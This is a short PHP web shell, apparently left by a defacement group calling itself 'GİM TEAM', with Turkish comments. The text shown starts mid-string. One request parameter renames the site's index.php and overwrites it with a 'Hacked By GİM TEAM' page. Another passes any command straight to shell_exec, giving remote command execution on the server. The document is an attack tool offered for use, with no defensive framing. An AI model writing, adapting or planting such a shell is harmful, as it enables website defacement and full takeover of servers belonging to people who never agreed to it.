GİM TEAM - Sistem Kontrolü Aktif
"; echo "Dizin: " . getcwd() . "

"; // 1. Ana dizindeki mevcut index'i yedekle ve değiştir if (isset($_GET['hack'])) { $target = "index.php"; $backup = "index_old.php"; // Senin hazırladığın Matrix efektli HTML içeriği (Buraya kendi kodunu yapıştır) $gim_index = '

Hacked By GİM TEAM

'; if (file_exists($target)) { rename($target, $backup); echo "[+] Eski index yedeklendi: $backup
"; } $file = fopen($target, "w"); fwrite($file, $gim_index); fclose($file); echo "[!] Yeni GİM TEAM indexi ana dizine basıldı!"; } // 2. Manuel Komut Çalıştırma (RCE) if (isset($_GET['cmd'])) { echo "
" . shell_exec($_GET['cmd']) . "
"; } ?>